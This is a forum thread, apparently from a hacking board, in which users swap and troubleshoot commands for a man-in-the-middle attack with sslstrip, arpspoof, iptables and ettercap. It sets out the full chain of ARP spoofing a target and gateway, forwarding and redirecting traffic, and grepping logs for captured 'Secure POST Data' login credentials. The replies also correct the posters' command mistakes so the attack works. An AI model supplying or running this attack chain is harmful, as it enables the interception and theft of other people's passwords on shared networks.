Also another way of doing it (which I think is BEST)
sslstrip -a -k -f -l 8080
Ctrl+v (paste) "Secure POST Data"
and you will see the following (Ex: login.yahoo.com) login details within the next line.
F3 will guide you through all of your logins by order of entry.
Hope this helps anyone who is having trouble filtering out all the bs in the logs...
Great tutorial, although I'm wondering, what command in here is it that gives no warning?
And how do you know what to grep for? And when to do it?
Also with this I noticed you did not sign into Yahoo mail, is it because the account did not exist? I'm guessing that anyway :P
I kinda lol'd when I saw "w00t no warning" then "wrong account info" in the other window ^^
I successfully ran sslstrip within my own network against my second laptop, and it worked perfectly. However, subsequent attempts against that laptop are not working. For one thing, when I check the MAC address on the victim machine (arp -a) I am not getting the same results as I did on the first attempt. Also, the log file I am keeping on the attacker machine is empty. Most importantly, when I went to gmail (on subsequent attempts) I got https instead of http.
Here are the commands I used on the first (and subsequent attempts):
echo 1 > /proc/sys/net/ipv4/ip-forward
arpspoof -1 wlan0 -t 192.168.5 192.168.2.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
python sslstrip.py -w logfile
Running backtrack 4
I am wondering whether there are any specific commands I should have run after the first attempt to terminate/kill some of these processes, keeping in mind that after the first successful attempt I completely shut down the attacker machine and put the victim machine into sleep mode before attempting subsequent attempts (and I rebooted the wireless router).
Any ideas welcome
Ok so first of all, check that you have no firewall on.
Second I would suggest you do this using ettercap too like this:
Your command looks like this:
[CODE]echo 1 > /proc/sys/net/ipv4/ip-forward[/CODE]
When it should look like this:
echo 1 > /proc/sys/net/ipv4/ip_forward
If you also want ettercap here, you edit /etc/etter.conf and then type:
arpspoof -i wlan0 -t target gateway (not arpspoof -1)
sslstrip -a -f -k
ettercap -T -q -i wlan0